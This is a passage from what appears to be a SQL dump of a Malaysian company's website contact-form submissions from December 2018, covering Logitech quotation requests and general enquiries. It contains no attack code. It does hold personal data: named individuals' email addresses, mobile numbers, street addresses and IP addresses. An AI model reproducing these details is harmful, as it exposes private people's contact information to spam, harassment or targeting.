2\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"54\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 15:30:46','118.100.67.42','1'),(10,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"miesya\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"fhamiesyahh1311@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01155094282\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Bintara Solutions Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"G54 KG BATU 1\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"pls quote\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 17:45:09','118.100.67.42','1'),(11,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Vengadesh Apayee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"vengadesh.apayee@prasarana.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0133360579\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Prasarana\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"would like to meet up to discuss further on the requirements.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"33\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-12 16:48:10','211.25.233.75','1'),(12,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"fahmi@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:47:\"Logitech Group, Logitech Rally, Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"test 123\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-12 17:20:29','60.49.98.41','1'),(13,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"yanaeiya95@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0199338437\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"TESTTTTTTTT\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:113:\"Logitech Group, Logitech Rally, Logitech MeetUp, Logitech Connect, Logitech BCC950, Logitech PTZ Pro 2, SMARTDOCK\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"34\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-12 17:22:23','60.49.98.41','1'),(14,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 2\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"fahmi@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 2\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 2\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test 1 2 3 4 5\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:55:\"Logitech Group, Logitech Rally, Logitech SmartDock Flex\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"1 2 3\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-12 17:33:29','60.49.98.41','1'),(15,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Nor Faiz Muhammad Noor\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"faiz@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193192610\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Bintara Solutions Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"27-3, Jalan Setiawangsa 9\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"ssss\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"14\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-12 17:49:03','60.49.98.41','1'),(16,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Muhammad Faris Bin Neil Rashdan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"faris.neil@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193332013\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1:\"-\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Is there any slot for internship for february 2019\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 